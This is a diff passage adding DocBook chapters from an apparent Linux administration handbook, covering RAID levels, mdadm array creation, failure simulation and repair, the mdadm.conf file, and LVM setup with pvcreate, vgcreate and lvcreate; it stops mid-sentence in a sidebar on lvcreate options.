+		RAID level, even though redundancy is stored
+		differently.</para>
+
+		<para>It is therefore important, when setting up RAID
+		arrays (except for RAID-0 and “linear RAID”), to only
+		assemble disks of identical, or very close, sizes, to avoid
+		wasting resources.</para>
+              </sidebar>
+
+              <sidebar>
+                <title><emphasis>NOTE</emphasis> Spare disks</title>
+
+		<para>RAID levels that include redundancy allow assigning
+		more disks than required to an array. The extra disks are
+		used as spares when one of the main disks fails. For
+		instance, in a mirror of two disks plus one spare, if one
+		of the first two disks fails, the kernel will automatically
+		(and immediately) reconstruct the mirror using the spare
+		disk, so that redundancy stays assured after the
+		reconstruction time. This can be used as another kind of
+		safeguard for critical data.</para>
+
+		<para>One would be forgiven for wondering how this is
+		better than simply mirroring on three disks to start with.
+		The advantage of the “spare disk” configuration is that
+		the spare disk can be shared across several RAID volumes.
+		For instance, one can have three mirrored volumes, with
+		redundancy assured even in the event of one disk failure,
+		with only seven disks (three pairs, plus one shared spare),
+		instead of the nine disks that would be required by three
+		triplets.</para>
+              </sidebar>
+
+	      <para>This RAID level, although expensive (since only half of
+	      the physical storage space, at best, is useful), is widely
+	      used in practice. It is simple to understand, and it allows
+	      very simple backups: since both disks have identical
+	      contents, one of them can be temporarily extracted with no
+	      impact on the working system. Read performance is often
+	      increased since the kernel can read half of the data on each
+	      disk in parallel, while write performance isn't too severely
+	      degraded. In case of a RAID-1 array of N disks, the data
+	      stays available even with N-1 disk failures.</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-4</term>
+            <listitem>
+	      <para>This RAID level, not widely used, uses N disks to store
+	      useful data, and an extra disk to store redundancy
+	      information. If that disk fails, the system can reconstruct
+	      its contents from the other N. If one of the N data disks
+	      fails, the remaining N-1 combined with the “parity” disk
+	      contain enough information to reconstruct the required
+	      data.</para>
+
+	      <para>RAID-4 isn't too expensive since it only involves a
+	      one-in-N increase in costs and has no noticeable impact on
+	      read performance, but writes are slowed down. Furthermore,
+	      since a write to any of the N disks also involves a write to
+	      the parity disk, the latter sees many more writes than the
+	      former, and its lifespan can shorten dramatically as a
+	      consequence. Data on a RAID-4 array is safe only up to one
+	      failed disk (of the N+1).</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-5</term>
+            <listitem>
+	      <para>RAID-5 addresses the asymmetry issue of RAID-4: parity
+	      blocks are spread over all of the N+1 disks, with no single
+	      disk having a particular role.</para>
+
+	      <para>Read and write performance are identical to RAID-4.
+	      Here again, the system stays functional with up to one failed
+	      disk (of the N+1), but no more.</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-6</term>
+            <listitem>
+	      <para>RAID-6 can be considered an extension of RAID-5, where
+	      each series of N blocks involves two redundancy blocks, and
+	      each such series of N+2 blocks is spread over N+2
+	      disks.</para>
+
+	      <para>This RAID level is slightly more expensive than the
+	      previous two, but it brings some extra safety since up to two
+	      drives (of the N+2) can fail without compromising data
+	      availability. The counterpart is that write operations now
+	      involve writing one data block and two redundancy blocks,
+	      which makes them even slower.</para>
+            </listitem>
+          </varlistentry>
+          <varlistentry>
+            <term>RAID-1+0</term>
+            <listitem>
+	      <para>This isn't strictly speaking, a RAID level, but a
+	      stacking of two RAID groupings. Starting from 2×N disks, one
+	      first sets them up by pairs into N RAID-1 volumes; these N
+	      volumes are then aggregated into one, either by “linear
+	      RAID” or (increasingly) by LVM. This last case goes farther
+	      than pure RAID, but there's no problem with that.</para>
+
+	      <para>RAID-1+0 can survive multiple disk failures: up to N in
+	      the 2×N array described above, provided that at least one
+	      disk keeps working in each of the RAID-1 pairs.</para>
+
+              <sidebar id="sidebar.raid-10">
+                <title><emphasis>GOING FURTHER</emphasis> RAID-10</title>
+
+		<para>RAID-10 is generally considered a synonym of
+		RAID-1+0, but a Linux specificity makes it actually a
+		generalization. This setup allows a system where each block
+		is stored on two different disks, even with an odd number
+		of disks, the copies being spread out along a configurable
+		model.</para>
+
+		<para>Performances will vary depending on the chosen
+		repartition model and redundancy level, and of the workload
+		of the logical volume.</para>
+              </sidebar>
+            </listitem>
+          </varlistentry>
+        </variablelist>
+
+	<para>Obviously, the RAID level will be chosen according to the
+	constraints and requirements of each application. Note that a
+	single computer can have several distinct RAID arrays with
+	different configurations.</para>
+      </section>
+      <section id="sect.raid-setup">
+        <title>Setting up RAID</title>
+        <indexterm><primary><emphasis role="pkg">mdadm</emphasis></primary></indexterm> 
+
+	<para>Setting up RAID volumes requires the <emphasis role="pkg">mdadm</emphasis> package; it
+	provides the <command>mdadm</command> command, which allows
+	creating and manipulating RAID arrays, as well as scripts and tools
+	integrating it to the rest of the system, including the monitoring
+	system.</para>
+
+	<para>Our example will be a server with a number of disks, some of
+	which are already used, the rest being available to setup RAID. We
+	initially have the following disks and partitions:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>the <filename>sdb</filename> disk, 4 GB, is entirely
+	    available;</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>sdc</filename> disk, 4 GB, is also
+	    entirely available;</para>
+          </listitem>
+          <listitem>
+	    <para>on the <filename>sdd</filename> disk, only partition
+	    <filename>sdd2</filename> (about 4 GB) is available;</para>
+          </listitem>
+          <listitem>
+	    <para>finally, a <filename>sde</filename> disk, still 4 GB,
+	    entirely available.</para>
+          </listitem>
+        </itemizedlist>
+
+        <sidebar>
+          <title><emphasis>NOTE</emphasis> Identifying existing RAID volumes</title>
+
+	  <para>The <filename>/proc/mdstat</filename> file lists existing
+	  volumes and their states. When creating a new RAID volume, care
+	  should be taken not to name it the same as an existing
+	  volume.</para>
+        </sidebar>
+
+	<para>We're going to use these physical elements to build two
+	volumes, one RAID-0 and one mirror (RAID-1). Let's start with the
+	RAID-0 volume:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm --create /dev/md0 --level=0 --raid-devices=2 /dev/sdb /dev/sdc</userinput>
+<computeroutput>mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md0 started.
+# </computeroutput><userinput>mdadm --query /dev/md0</userinput>
+<computeroutput>/dev/md0: 8.00GiB raid0 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </computeroutput><userinput>mdadm --detail /dev/md0</userinput>
+<computeroutput>/dev/md0:
+        Version : 1.2
+  Creation Time : Wed May  6 09:24:34 2015
+     Raid Level : raid0
+     Array Size : 8387584 (8.00 GiB 8.59 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:24:34 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+     Chunk Size : 512K
+
+           Name : mirwiz:0  (local to host mirwiz)
+           UUID : bb085b35:28e821bd:20d697c9:650152bb
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       16        0      active sync   /dev/sdb
+       1       8       32        1      active sync   /dev/sdc
+# </computeroutput><userinput>mkfs.ext4 /dev/md0</userinput>
+<computeroutput>mke2fs 1.42.12 (29-Aug-2014)
+Creating filesystem with 2095104 4k blocks and 524288 inodes
+Filesystem UUID: fff08295-bede-41a9-9c6a-8c7580e520a6
+Superblock backups stored on blocks: 
+        32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632
+
+Allocating group tables: done                            
+Writing inode tables: done                            
+Creating journal (32768 blocks): done
+Writing superblocks and filesystem accounting information: done 
+# </computeroutput><userinput>mkdir /srv/raid-0</userinput>
+<computeroutput># </computeroutput><userinput>mount /dev/md0 /srv/raid-0</userinput>
+<computeroutput># </computeroutput><userinput>df -h /srv/raid-0</userinput>
+<computeroutput>Filesystem      Size  Used Avail Use% Mounted on
+/dev/md0        7.9G   18M  7.4G   1% /srv/raid-0
+</computeroutput>
+</screen>
+
+	<para>The <command>mdadm --create</command> command requires
+	several parameters: the name of the volume to create
+	(<filename>/dev/md*</filename>, with MD standing for
+	<foreignphrase>Multiple Device</foreignphrase>), the RAID
+	level, the number of disks (which is compulsory despite being
+	mostly meaningful only with RAID-1 and above), and the
+	physical drives to use. Once the device is created, we can use
+	it like we'd use a normal partition, create a filesystem on
+	it, mount that filesystem, and so on. Note that our creation
+	of a RAID-0 volume on <filename>md0</filename> is nothing but
+	coincidence, and the numbering of the array doesn't need to be
+	correlated to the chosen amount of redundancy.  It's also
+	possible to create named RAID arrays, by giving
+	<command>mdadm</command> parameters such as
+	<filename>/dev/md/linear</filename> instead of
+	<filename>/dev/md0</filename>.</para>
+
+	<para>Creation of a RAID-1 follows a similar fashion, the
+	differences only being noticeable after the creation:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm --create /dev/md1 --level=1 --raid-devices=2 /dev/sdd2 /dev/sde</userinput>
+<computeroutput>mdadm: Note: this array has metadata at the start and
+    may not be suitable as a boot device.  If you plan to
+    store '/boot' on this device please ensure that
+    your boot-loader understands md/v1.x metadata, or use
+    --metadata=0.90
+mdadm: largest drive (/dev/sdd2) exceeds size (4192192K) by more than 1%
+Continue creating array? </computeroutput><userinput>y</userinput>
+<computeroutput>mdadm: Defaulting to version 1.2 metadata
+mdadm: array /dev/md1 started.
+# </computeroutput><userinput>mdadm --query /dev/md1</userinput>
+<computeroutput>/dev/md1: 4.00GiB raid1 2 devices, 0 spares. Use mdadm --detail for more detail.
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+        Version : 1.2
+  Creation Time : Wed May  6 09:30:19 2015
+     Raid Level : raid1
+     Array Size : 4192192 (4.00 GiB 4.29 GB)
+  Used Dev Size : 4192192 (4.00 GiB 4.29 GB)
+   Raid Devices : 2
+  Total Devices : 2
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:30:40 2015
+          State : clean, resyncing (PENDING) 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 0
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 0
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       1       8       64        1      active sync   /dev/sde
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+          State : clean
+[...]
+</computeroutput>
+</screen>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> RAID, disks and partitions</title>
+
+	  <para>As illustrated by our example, RAID devices can be
+	  constructed out of disk partitions, and do not require full
+	  disks.</para>
+        </sidebar>
+
+	<para>A few remarks are in order. First, <command>mdadm</command>
+	notices that the physical elements have different sizes; since this
+	implies that some space will be lost on the bigger element, a
+	confirmation is required.</para>
+
+	<para>More importantly, note the state of the mirror. The normal
+	state of a RAID mirror is that both disks have exactly the same
+	contents. However, nothing guarantees this is the case when the
+	volume is first created. The RAID subsystem will therefore provide
+	that guarantee itself, and there will be a synchronization phase as
+	soon as the RAID device is created. After some time (the exact
+	amount will depend on the actual size of the disks…), the RAID
+	array switches to the “active” or “clean”  state. Note that during this
+	reconstruction phase, the mirror is in a degraded mode, and
+	redundancy isn't assured. A disk failing during that risk window
+	could lead to losing all the data. Large amounts of critical data,
+	however, are rarely stored on a freshly created RAID array before
+	its initial synchronization. Note that even in degraded mode, the
+	<filename>/dev/md1</filename> is usable, and a filesystem can be
+	created on it, as well as some data copied on it.</para>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> Starting a mirror in degraded mode</title>
+
+	  <para>Sometimes two disks are not immediately available when one
+	  wants to start a RAID-1 mirror, for instance because one of the
+	  disks one plans to include is already used to store the data one
+	  wants to move to the array. In such circumstances, it is possible
+	  to deliberately create a degraded RAID-1 array by passing
+	  <filename>missing</filename> instead of a device file as one of
+	  the arguments to <command>mdadm</command>. Once the data have
+	  been copied to the “mirror”, the old disk can be added to the
+	  array. A synchronization will then take place, giving us the
+	  redundancy that was wanted in the first place.</para>
+        </sidebar>
+
+        <sidebar>
+          <title><emphasis>TIP</emphasis> Setting up a mirror without synchronization</title>
+
+	  <para>RAID-1 volumes are often created to be used as a new disk,
+	  often considered blank. The actual initial contents of the disk
+	  is therefore not very relevant, since one only needs to know that
+	  the data written after the creation of the volume, in particular
+	  the filesystem, can be accessed later.</para>
+
+	  <para>One might therefore wonder about the point of synchronizing
+	  both disks at creation time. Why care whether the contents are
+	  identical on zones of the volume that we know will only be read
+	  after we have written to them?</para>
+
+	  <para>Fortunately, this synchronization phase can be avoided by
+	  passing the <literal>--assume-clean</literal> option to
+	  <command>mdadm</command>. However, this option can lead to
+	  surprises in cases where the initial data will be read (for
+	  instance if a filesystem is already present on the physical
+	  disks), which is why it isn't enabled by default.</para>
+        </sidebar>
+
+	<para>Now let's see what happens when one of the elements of the
+	RAID-1 array fails. <command>mdadm</command>, in particular its
+	<literal>--fail</literal> option, allows simulating such a disk
+	failure:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --fail /dev/sde</userinput>
+<computeroutput>mdadm: set /dev/sde faulty in /dev/md1
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Update Time : Wed May  6 09:39:39 2015
+          State : clean, degraded 
+ Active Devices : 1
+Working Devices : 1
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 19
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       0        0        2      removed
+
+       1       8       64        -      faulty   /dev/sde</computeroutput>
+</screen>
+
+	<para>The contents of the volume are still accessible (and, if it is
+	mounted, the applications don't notice a thing), but the data
+	safety isn't assured anymore: should the <filename>sdd</filename>
+	disk fail in turn, the data would be lost. We want to avoid that
+	risk, so we'll replace the failed disk with a new one,
+	<filename>sdf</filename>:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --add /dev/sdf</userinput>
+<computeroutput>mdadm: added /dev/sdf
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+   Raid Devices : 2
+  Total Devices : 3
+    Persistence : Superblock is persistent
+
+    Update Time : Wed May  6 09:48:49 2015
+          State : clean, degraded, recovering 
+ Active Devices : 1
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 1
+
+ Rebuild Status : 28% complete
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 26
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      spare rebuilding   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde
+# </computeroutput><userinput>[...]</userinput>
+<computeroutput>[...]
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Update Time : Wed May  6 09:49:08 2015
+          State : clean 
+ Active Devices : 2
+Working Devices : 2
+ Failed Devices : 1
+  Spare Devices : 0
+
+           Name : mirwiz:1  (local to host mirwiz)
+           UUID : 6ec558ca:0c2c04a0:19bca283:95f67464
+         Events : 41
+
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf
+
+       1       8       64        -      faulty   /dev/sde</computeroutput>
+</screen>
+
+	<para>Here again, the kernel automatically triggers a
+	reconstruction phase during which the volume, although still
+	accessible, is in a degraded mode. Once the reconstruction is over,
+	the RAID array is back to a normal state. One can then tell the
+	system that the <filename>sde</filename> disk is about to be
+	removed from the array, so as to end up with a classical RAID
+	mirror on two disks:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm /dev/md1 --remove /dev/sde</userinput>
+<computeroutput>mdadm: hot removed /dev/sde from /dev/md1
+# </computeroutput><userinput>mdadm --detail /dev/md1</userinput>
+<computeroutput>/dev/md1:
+[...]
+    Number   Major   Minor   RaidDevice State
+       0       8       50        0      active sync   /dev/sdd2
+       2       8       80        1      active sync   /dev/sdf</computeroutput>
+</screen>
+
+	<para>From then on, the drive can be physically removed when the
+	server is next switched off, or even hot-removed when the hardware
+	configuration allows hot-swap. Such configurations include some
+	SCSI controllers, most SATA disks, and external drives operating on
+	USB or Firewire.</para>
+      </section>
+      <section id="sect.backup-raid-config">
+        <title>Backing up the Configuration</title>
+
+	<para>Most of the meta-data concerning RAID volumes are saved
+	directly on the disks that make up these arrays, so that the kernel
+	can detect the arrays and their components and assemble them
+	automatically when the system starts up. However, backing up this
+	configuration is encouraged, because this detection isn't
+	fail-proof, and it is only expected that it will fail precisely in
+	sensitive circumstances. In our example, if the
+	<filename>sde</filename> disk failure had been real (instead of
+	simulated) and the system had been restarted without removing this
+	<filename>sde</filename> disk, this disk could start working again
+	due to having been probed during the reboot. The kernel would then
+	have three physical elements, each claiming to contain half of the
+	same RAID volume. Another source of confusion can come when RAID
+	volumes from two servers are consolidated onto one server only. If
+	these arrays were running normally before the disks were moved, the
+	kernel would be able to detect and reassemble the pairs properly;
+	but if the moved disks had been aggregated into an
+	<filename>md1</filename> on the old server, and the new server
+	already has an <filename>md1</filename>, one of the mirrors would
+	be renamed.</para>
+
+	<para>Backing up the configuration is therefore important, if only
+	for reference. The standard way to do it is by editing the
+	<filename>/etc/mdadm/mdadm.conf</filename> file, an example of
+	which is listed here:</para>
+
+        <example id="example.mdadm-conf">
+          <title><command>mdadm</command> configuration file</title>
+
+          <programlisting># mdadm.conf
+#
+# Please refer to mdadm.conf(5) for information about this file.
+#
+
+# by default (built-in), scan all partitions (/proc/partitions) and all
+# containers for MD superblocks. alternatively, specify devices to scan, using
+# wildcards if desired.
+DEVICE /dev/sd*
+
+# auto-create devices with Debian standard permissions
+CREATE owner=root group=disk mode=0660 auto=yes
+
+# automatically tag new arrays as belonging to the local system
+HOMEHOST &lt;system&gt;
+
+# instruct the monitoring daemon where to send mail alerts
+MAILADDR root
+
+# definitions of existing MD arrays
+ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464
+
+# This configuration was auto-generated on Thu, 17 Jan 2013 16:21:01 +0100
+# by mkconf 3.2.5-3
+</programlisting>
+        </example>
+
+	<para>One of the most useful details is the
+	<literal>DEVICE</literal> option, which lists the devices
+	where the system will automatically look for components of
+	RAID volumes at start-up time. In our example, we replaced the
+	default value, <literal>partitions containers</literal>, with
+	an explicit list of device files, since we chose to use entire
+	disks and not only partitions, for some volumes.</para>
+
+	<para>The last two lines in our example are those allowing the
+	kernel to safely pick which volume number to assign to which
+	array.  The metadata stored on the disks themselves are enough
+	to re-assemble the volumes, but not to determine the volume
+	number (and the matching <filename>/dev/md*</filename> device
+	name).</para>
+
+	<para>Fortunately, these lines can be generated
+	automatically:</para>
+
+        <screen><computeroutput># </computeroutput><userinput>mdadm --misc --detail --brief /dev/md?</userinput>
+<computeroutput>ARRAY /dev/md0 metadata=1.2 name=mirwiz:0 UUID=bb085b35:28e821bd:20d697c9:650152bb
+ARRAY /dev/md1 metadata=1.2 name=mirwiz:1 UUID=6ec558ca:0c2c04a0:19bca283:95f67464</computeroutput>
+</screen>
+
+	<para>The contents of these last two lines doesn't depend on the
+	list of disks included in the volume. It is therefore not necessary
+	to regenerate these lines when replacing a failed disk with a new
+	one. On the other hand, care must be taken to update the file when
+	creating or deleting a RAID array.</para>
+      </section>
+    </section>
+    <section id="sect.lvm">
+      <title>LVM</title>
+      <indexterm><primary>LVM</primary></indexterm>
+      <indexterm><primary>Logical Volume Manager</primary></indexterm>
+
+      <para>LVM, the <emphasis>Logical Volume Manager</emphasis>, is another approach to
+      abstracting logical volumes from their physical supports, which
+      focuses on increasing flexibility rather than increasing reliability.
+      LVM allows changing a logical volume transparently as far as the
+      applications are concerned; for instance, it is possible to add new
+      disks, migrate the data to them, and remove the old disks, without
+      unmounting the volume.</para>
+      <section id="sect.lvm-concepts">
+        <title>LVM Concepts</title>
+
+	<para>This flexibility is attained by a level of abstraction
+	involving three concepts.</para>
+
+	<para>First, the PV (<emphasis>Physical Volume</emphasis>) is
+	the entity closest to the hardware: it can be partitions on a
+	disk, or a full disk, or even any other block device
+	(including, for instance, a RAID array). Note that when a
+	physical element is set up to be a PV for LVM, it should only
+	be accessed via LVM, otherwise the system will get
+	confused.</para>
+
+	<para>A number of PVs can be clustered in a VG (<emphasis>Volume
+	Group</emphasis>), which can be compared to disks both virtual and
+	extensible. VGs are abstract, and don't appear in a device file in
+	the <filename>/dev</filename> hierarchy, so there's no risk of
+	using them directly.</para>
+
+	<para>The third kind of object is the LV (<emphasis>Logical
+	Volume</emphasis>), which is a chunk of a VG; if we keep the
+	VG-as-disk analogy, the LV compares to a partition. The LV appears
+	as a block device with an entry in <filename>/dev</filename>, and it
+	can be used as any other physical partition can be (most commonly,
+	to host a filesystem or swap space).</para>
+
+	<para>The important thing is that the splitting of a VG into
+	LVs is entirely independent of its physical components (the
+	PVs). A VG with only a single physical component (a disk for
+	instance) can be split into a dozen logical volumes;
+	similarly, a VG can use several physical disks and appear as a
+	single large logical volume. The only constraint, obviously,
+	is that the total size allocated to LVs can't be bigger than
+	the total capacity of the PVs in the volume group.</para>
+
+	<para>It often makes sense, however, to have some kind of
+	homogeneity among the physical components of a VG, and to split the
+	VG into logical volumes that will have similar usage patterns. For
+	instance, if the available hardware includes fast disks and slower
+	disks, the fast ones could be clustered into one VG and the slower
+	ones into another; chunks of the first one can then be assigned to
+	applications requiring fast data access, while the second one will
+	be kept for less demanding tasks.</para>
+
+	<para>In any case, keep in mind that an LV isn't particularly
+	attached to any one PV. It is possible to influence where the data
+	from an LV are physically stored, but this possibility isn't
+	required for day-to-day use. On the contrary: when the set of
+	physical components of a VG evolves, the physical storage locations
+	corresponding to a particular LV can be migrated across disks
+	(while staying within the PVs assigned to the VG, of
+	course).</para>
+      </section>
+      <section id="sect.lvm-setup">
+        <title>Setting up LVM</title>
+
+	<para>Let us now follow, step by step, the process of setting up
+	LVM for a typical use case: we want to simplify a complex storage
+	situation. Such a situation usually happens after some long and
+	convoluted history of accumulated temporary measures. For the
+	purposes of illustration, we'll consider a server where the storage
+	needs have changed over time, ending up in a maze of available
+	partitions split over several partially used disks. In more
+	concrete terms, the following partitions are available:</para>
+        <itemizedlist>
+          <listitem>
+	    <para>on the <filename>sdb</filename> disk, a
+	    <filename>sdb2</filename> partition, 4 GB;</para>
+          </listitem>
+          <listitem>
+	    <para>on the <filename>sdc</filename> disk, a
+	    <filename>sdc3</filename> partition, 3 GB;</para>
+          </listitem>
+          <listitem>
+	    <para>the <filename>sdd</filename> disk, 4 GB, is fully
+	    available;</para>
+          </listitem>
+          <listitem>
+	    <para>on the <filename>sdf</filename> disk, a
+	    <filename>sdf1</filename> partition, 4 GB; and a
+	    <filename>sdf2</filename> partition, 5 GB.</para>
+          </listitem>
+        </itemizedlist>
+
+	<para>In addition, let's assume that disks <filename>sdb</filename>
+	and <filename>sdf</filename> are faster than the other two.</para>
+
+	<para>Our goal is to set up three logical volumes for three
+	different applications: a file server requiring 5 GB of storage
+	space, a database (1 GB) and some space for back-ups (12 GB). The
+	first two need good performance, but back-ups are less critical in
+	terms of access speed. All these constraints prevent the use of
+	partitions on their own; using LVM can abstract the physical size
+	of the devices, so the only limit is the total available
+	space.</para>
+
+	<para>The required tools are in the <emphasis role="pkg">lvm2</emphasis> package and its dependencies. When
+	they're installed, setting up LVM takes three steps, matching the
+	three levels of concepts.</para>
+
+	<para>First, we prepare the physical volumes using
+	<command>pvcreate</command>:</para>
+
+        <screen id="screen.pvcreate"><computeroutput># </computeroutput><userinput>pvdisplay</userinput>
+<computeroutput># </computeroutput><userinput>pvcreate /dev/sdb2</userinput>
+<computeroutput>  Physical volume "/dev/sdb2" successfully created
+# </computeroutput><userinput>pvdisplay</userinput>
+<computeroutput>  "/dev/sdb2" is a new physical volume of "4.00 GiB"
+  --- NEW Physical volume ---
+  PV Name               /dev/sdb2
+  VG Name               
+  PV Size               4.00 GiB
+  Allocatable           NO
+  PE Size               0   
+  Total PE              0
+  Free PE               0
+  Allocated PE          0
+  PV UUID               0zuiQQ-j1Oe-P593-4tsN-9FGy-TY0d-Quz31I
+
+# </computeroutput><userinput>for i in sdc3 sdd sdf1 sdf2 ; do pvcreate /dev/$i ; done</userinput>
+<computeroutput>  Physical volume "/dev/sdc3" successfully created
+  Physical volume "/dev/sdd" successfully created
+  Physical volume "/dev/sdf1" successfully created
+  Physical volume "/dev/sdf2" successfully created
+# </computeroutput><userinput>pvdisplay -C</userinput>
+<computeroutput>  PV         VG   Fmt  Attr PSize PFree
+  /dev/sdb2       lvm2 ---  4.00g 4.00g
+  /dev/sdc3       lvm2 ---  3.09g 3.09g
+  /dev/sdd        lvm2 ---  4.00g 4.00g
+  /dev/sdf1       lvm2 ---  4.10g 4.10g
+  /dev/sdf2       lvm2 ---  5.22g 5.22g
+</computeroutput>
+</screen>
+
+	<para>So far, so good; note that a PV can be set up on a full disk
+	as well as on individual partitions of it. As shown above, the
+	<command>pvdisplay</command> command lists the existing PVs, with
+	two possible output formats.</para>
+
+	<para>Now let's assemble these physical elements into VGs using
+	<command>vgcreate</command>. We'll gather only PVs from the fast
+	disks into a <filename>vg_critical</filename> VG; the other VG,
+	<filename>vg_normal</filename>, will also include slower
+	elements.</para>
+
+        <screen id="screen.vgcreate"><computeroutput># </computeroutput><userinput>vgdisplay</userinput>
+<computeroutput>  No volume groups found
+# </computeroutput><userinput>vgcreate vg_critical /dev/sdb2 /dev/sdf1</userinput>
+<computeroutput>  Volume group "vg_critical" successfully created
+# </computeroutput><userinput>vgdisplay</userinput>
+<computeroutput>  --- Volume group ---
+  VG Name               vg_critical
+  System ID             
+  Format                lvm2
+  Metadata Areas        2
+  Metadata Sequence No  1
+  VG Access             read/write
+  VG Status             resizable
+  MAX LV                0
+  Cur LV                0
+  Open LV               0
+  Max PV                0
+  Cur PV                2
+  Act PV                2
+  VG Size               8.09 GiB
+  PE Size               4.00 MiB
+  Total PE              2071
+  Alloc PE / Size       0 / 0   
+  Free  PE / Size       2071 / 8.09 GiB
+  VG UUID               bpq7zO-PzPD-R7HW-V8eN-c10c-S32h-f6rKqp
+
+# </computeroutput><userinput>vgcreate vg_normal /dev/sdc3 /dev/sdd /dev/sdf2</userinput>
+<computeroutput>  Volume group "vg_normal" successfully created
+# </computeroutput><userinput>vgdisplay -C</userinput>
+<computeroutput>  VG          #PV #LV #SN Attr   VSize  VFree 
+  vg_critical   2   0   0 wz--n-  8.09g  8.09g
+  vg_normal     3   0   0 wz--n- 12.30g 12.30g
+</computeroutput>
+</screen>
+
+	<para>Here again, commands are rather straightforward (and
+	<command>vgdisplay</command> proposes two output formats). Note
+	that it is quite possible to use two partitions of the same physical
+	disk into two different VGs. Note also that we used a
+	<filename>vg_</filename> prefix to name our VGs, but it is nothing
+	more than a convention.</para>
+
+	<para>We now have two “virtual disks”, sized about 8 GB and
+	12 GB, respectively. Let's now carve them up into “virtual
+	partitions” (LVs). This involves the <command>lvcreate</command>
+	command, and a slightly more complex syntax:</para>
+
+        <screen id="screen.lvcreate"><computeroutput># </computeroutput><userinput>lvdisplay</userinput>
+<computeroutput># </computeroutput><userinput>lvcreate -n lv_files -L 5G vg_critical</userinput>
+<computeroutput>  Logical volume "lv_files" created
+# </computeroutput><userinput>lvdisplay</userinput>
+<computeroutput>  --- Logical volume ---
+  LV Path                /dev/vg_critical/lv_files
+  LV Name                lv_files
+  VG Name                vg_critical
+  LV UUID                J3V0oE-cBYO-KyDe-5e0m-3f70-nv0S-kCWbpT
+  LV Write Access        read/write
+  LV Creation host, time mirwiz, 2015-06-10 06:10:50 -0400
+  LV Status              available
+  # open                 0
+  LV Size                5.00 GiB
+  Current LE             1280
+  Segments               2
+  Allocation             inherit
+  Read ahead sectors     auto
+  - currently set to     256
+  Block device           253:0
+
+# </computeroutput><userinput>lvcreate -n lv_base -L 1G vg_critical</userinput>
+<computeroutput>  Logical volume "lv_base" created
+# </computeroutput><userinput>lvcreate -n lv_backups -L 12G vg_normal</userinput>
+<computeroutput>  Logical volume "lv_backups" created
+# </computeroutput><userinput>lvdisplay -C</userinput>
+<computeroutput>  LV         VG          Attr     LSize  Pool Origin Data%  Meta%  Move Log Cpy%Sync  Convert
+  lv_base    vg_critical -wi-a---  1.00g                                           
+  lv_files   vg_critical -wi-a---  5.00g                                           
+  lv_backups vg_normal   -wi-a--- 12.00g</computeroutput>
+</screen>
+
+	<para>Two parameters are required when creating logical volumes;
+	they must be passed to the <command>lvcreate</command> as options.
+	The name of the LV to be created is specified with the
+	<literal>-n</literal> option, and its size is generally given using
+	the <literal>-L</literal> option. We also need to tell the command
+	what VG to operate on, of course, hence the last parameter on the
+	command line.</para>
+
+        <sidebar>
+          <title><emphasis>GOING FURTHER</emphasis> <command>lvcreate</command> options</title>
+
+	  <para>The <command>lvcreate</command> command has several options
+	  to allow tweaking how the LV is created.</para>
+
+	  <para>Let's first describe the <literal>-l</literal> option, with
+	  which the LV's size can be given as a number of blocks (as
+	  opposed to the “human” units we used above). These blocks
+	  (called PEs, <emphasis>physical extents</emphasis>, in LVM terms)
+	  are contiguous units of storage space in PVs, and they can't be
+	  split across LVs. When one wants to define storage space for an
+	  LV with some precision, for instance to use the full available
+	  space, the <literal>-l</literal> option will probably be
+	  preferred over <literal>-L</literal>.</para>
+
+	  <para>It's also possible to hint at the physical location of an
+	  LV, so that its extents are stored on a particular PV (while
+	  staying within the ones assigned to the VG, of course). Since we
+	  know that <filename>sdb</filename> is faster than
+	  <filename>sdf</filename>, we may want to store the
